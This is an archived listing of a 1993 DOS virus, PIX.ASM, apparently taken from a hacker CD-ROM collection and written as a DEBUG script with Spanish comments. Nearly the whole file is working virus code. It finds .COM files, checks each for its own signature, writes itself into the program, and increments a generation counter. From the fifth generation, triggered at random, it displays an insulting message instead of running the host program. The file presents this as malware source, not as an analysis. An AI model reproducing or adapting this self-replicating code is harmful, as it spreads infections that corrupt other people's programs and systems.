home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 15 / hacker15 / 15_H4CK3R#15.ISO / virus / pix / PIX.ASM
Encoding:
Assembly Source File  |  1993-09-28  |  2.2 KB  |  121 lines
  1. NPIX.COM
  2. A
  3. JMP 0116
  4. DB  90,49,56,00,2A,2E,43,4F,4D,00,4F,04,00,00,01,00,00,00,00,00
  5. MOV AX,CS
  6. ADD AX,1000
  7. MOV ES,AX
  8. INC BYTE PTR [0105] ; Incrementa el contador de generaciones.
  9. MOV SI,0100
  10. XOR DI,DI
  11. MOV CX,014F
  12. REPZ
  13. MOVSB
  14. MOV DX,025F
  15. MOV AH,1A
  16. INT 21              ;Se encarga de crear el DTA para los ficheros...
  17. MOV DX,0106         ;con extension.COM
  18. MOV CX,0018
  19. MOV AH,4E
  20. INT 21
  21. JB 019E
  22. MOV DX,027D
  23. MOV AX,3D02         ;Abre el fichero en modo lectura/escritura.
  24. INT 21
  25. MOV [0114],AX
  26. MOV BX,AX
  27. PUSH ES
  28. POP DS
  29. MOV DX,034F
  30. MOV CX,FFFF
  31. MOV AH,3F
  32. INT 21
  33. ADD AX,034F
  34. CS:
  35. MOV [0112],AX       ;A continuacion, la firma del virus:
  36. dB 3E,81,3E
  37. DB 52,03
  38. DB 49,56
  39. JZ 0188
  40. XOR CX,CX
  41. MOV DX,CX
  42. CS:
  43. MOV BX,[0114]
  44. MOV AX,4200
  45. INT 21              ;Desplaza el puntero.
  46. JB 0188
  47. MOV DX,0000
  48. CS:
  49. MOV CX,[0112]
  50. CS:
  51. MOV BX,[0114]
  52. MOV AH,40
  53. INT 21              ;Salva virus y programa contaminado.
  54. CS:
  55. MOV BX,[0112]
  56. MOV AH,3E
  57. INT 21              ;Cierra el fichero.
  58. PUSH CS
  59. POP DS
  60. MOV AH,4F
  61. MOV DX,025F
  62. INT 21
  63. JB 019E
  64. JMP 013E
  65. MOV DX,0080
  66. MOV AH,1A
  67. INT 21              ;Restaura el DTA original.
  68. CMP BYTE PTR [0105],05 ; ¿Quinta generacio?...
  69. JB 0207                ; Si es asi, comienza el espectaculo.
  70. MOV AX,0040
  71. MOV DS,AX
  72. MOV AX,[006C]       ; Aleatoriedad de manifestacion del virus...
  73. PUSH CS             ; mediante el registro de decimas de segundo.
  74. POPDS
  75. AND AX,0001
  76. JZ 0207
  77. MOV DX,01C4
  78. MOV AH,09
  79. INT 21
  80. INT 20              ; A continuacion, el mensaje del virus.
  81. DB 59,4F,55,52,20,50,43,20,48,41,56,45,20,41,20,4D,45,53,53,41,4A,52
  82. DB 20,46,4F,52,20,59,4F,55,20,3A,20,4A,4F,44,45,54,45,20,59,20,45,53
  83. DB 50,45,52,41,20,43,41,4D,49,4C,4F,20,4A,4F,53,45,20,43,45,4C,41,2E
  84. DB 24
  85. MOV SI,0224
  86. MOV CX,002B
  87. XOR DI,DI
  88. REPZ
  89. MOVSB
  90. XOR DI,DI
  91. CS:
  92. MOV WORD PTR [010E],0000
  93. CS:
  94. MOV [0110],ES
  95. CS:
  96. JMP FAR [010E]
  97. PUSH DS
  98. POP ES
  99. MOV SI,044F
  100. CMP BYTE PTR [0105],01
  101. JNZ 0234
  102. SUB SI,0200
  103. MOV DI,0100
  104. MOV CX,FFFF
  105. SUB CX,SI
  106. REPZ
  107. MOVSB
  108. CS:
  109. MOV WORD PTR [0100],0100
  110. CS:
  111. MOV [0102],DS
  112. CS:
  113. JMP FAR [0100]      ; Salto a la ejecucion del verdadero programa...
  114. INT 20              ; siempre que se trate de una generacion...
  115. INT 20              ; posterior a la primera, y por tanto, exista.
  116. DB 0,0
  117.  
  118. RCX
  119. 154
  120. W
  121. Q